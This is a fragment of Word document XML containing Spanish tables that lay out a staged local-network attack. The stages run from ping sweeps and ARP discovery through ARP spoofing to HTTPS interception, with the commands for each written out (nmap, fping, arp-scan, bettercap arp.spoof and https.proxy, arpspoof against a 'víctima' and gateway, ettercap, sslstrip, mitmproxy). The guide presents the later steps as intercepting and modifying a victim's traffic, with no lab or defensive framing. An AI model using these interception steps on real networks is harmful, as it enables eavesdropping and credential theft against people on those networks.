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4.2491361241717"/>
        <w:gridCol w:w="2216.9551108269743"/>
        <w:gridCol w:w="2717.857102394575"/>
        <w:gridCol w:w="881.2164666467052"/>
        <w:gridCol w:w="2495.233995031197"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="714.2491361241717"/>
            <w:gridCol w:w="2216.9551108269743"/>
            <w:gridCol w:w="2717.857102394575"/>
            <w:gridCol w:w="881.2164666467052"/>
            <w:gridCol w:w="2495.2339950311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Qué hicimos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¿Qué necesitas?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 básico (Ping Sweeping)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Escaneamos toda la red enviando paquetes de 'ping' a cada IP para ver quién responde.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Termux/Kali conectado a la red,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nmap</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="1155cc"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> o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fping</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="1155cc"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">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 intermedio (ARP Discovery)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Descubrimos dispositivos enviando solicitudes ARP.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Termux/Kali, permisos de red, herramientas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bettercap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netdiscover</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="1155cc"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">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Intercepción básica (ARP Spoofing)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Fingimos ser otro dispositivo para recibir tráfico de la víctima.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Termux/Kali con permisos root,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bettercap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arpspoof</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="1155cc"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">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Intercepción avanzada (MiTM y Sniffing HTTPS)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Interceptamos tráfico cifrado o plano, incluso modificándolo.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Kali o Termux configurado,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bettercap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sslstrip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mitmproxy</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="1155cc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6.9502190887227"/>
        <w:gridCol w:w="1647.4391328698975"/>
        <w:gridCol w:w="3021.091819589497"/>
        <w:gridCol w:w="3630.0306394755053"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="726.9502190887227"/>
            <w:gridCol w:w="1647.4391328698975"/>
            <w:gridCol w:w="3021.091819589497"/>
            <w:gridCol w:w="3630.030639475505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Kali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Ping Sweeping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0b539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5394"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">nmap -sn 192.168.1.0/24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1155cc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nmap -sn 192.168.1.0/24</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="1155cc"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> o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fping -a -g 192.168.1.0/24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ARP Discovery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0b539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5394"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">bettercap -eval "net.probe on"</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="0b5394"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> (requiere root)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1155cc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arp-scan --localnet</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="1155cc"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> o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netdiscover -r 192.168.1.0/24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ARP Spoofing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0b539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5394"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">bettercap -eval "net.probe on; arp.spoof on"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1155cc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arpspoof -i wlan0 -t [IP víctima] [IP gateway]</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="1155cc"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> o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ettercap -G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HTTPS Sniffing / MiTM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0b539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5394"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">bettercap -eval "https.proxy on"</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="0b5394"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> (requiere root)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1155cc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bettercap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sslstrip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mitmproxy</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="1155cc"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">, o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ettercap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